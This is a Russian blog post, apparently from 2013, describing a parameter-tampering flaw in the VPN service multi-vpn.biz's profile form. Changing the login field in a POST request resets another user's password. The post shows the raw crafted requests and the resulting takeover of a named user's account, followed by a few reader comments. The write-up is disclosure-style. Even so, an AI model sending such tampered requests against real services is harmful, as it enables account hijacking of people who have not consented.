О! %username%, ты что ли? Давно тебя не видел! Ну проходи-проходи…
В общем, давеча стукнул в твиттер господин Lukmus, и говорит — если хочешь крутой VPN — multi-vpn.biz, ставь баннер на бложек и он тебе даром достанется!
@i_bo0om вешаешь баннер себе на блог, пока висит баннер — у тебя на балансе миллионы, берешь что хочешь pic.twitter.com/SktTGFAphX
— lukmus (@thelukmus) July 18, 2013
Ну вроде-бы неплохо.
Решил тогда я зарегистрироваться. Зарегистрировавшись, я понял, что можно отжать у Lukmus’а аккаунт, заюзав CSRF. Но чёрт возьми, смена пароля не работала корректно, вылезала какая-то ошибка в общем! Пришлось писать жалобу админам, чтобы сделали смену пароля. И вот я вспомнил об этом сервисе, решил уже замутить CSRF, но тут заметил необычную строку…
POST /cabinet/?thread=profile HTTP/1.1
Host: multi-vpn.biz
...
id=522&data[active]=Y&data[is_admin]=N[email protected]&
newpassword=Pa$$w0rd12345&rpassword=Pa$$w0rd12345
Ты увидел data[is_admin]=N? И наверное уже догадался, что будет дальше? А вот фиг тебе! data[is_admin]=Y ничего не изменил (ну по крайней мере на первый взгляд), а вот если изменить логин, то пароль успешно меняется!
POST /cabinet/?thread=profile HTTP/1.1
Host: multi-vpn.biz
...
id=522&data[active]=Y&data[is_admin]=Y&login=lukmus[email protected]&
newpassword=Pa$$w0rd12345&rpassword=Pa$$w0rd12345
Прикольно, да? Ну дальше авторизуемся lukmus;Pa$$w0rd12345 и получаем такую картину
Богатство аккаунта. Жаль вывести нельзя 🙁
Lukmus не врал!
Можно ещё изучать сервис, думаю много будет интересных моментов, а у меня больше времени нет, так что бывай, дела 😉
А где можно взять их баннер для установки на блог? Нужны в саппорт писать?
Graver, да
Здравствуйте, хотел попросить вас об услуге, оплата само собой, помогите решить один вопрос, свяжитесь пожалуйста со мной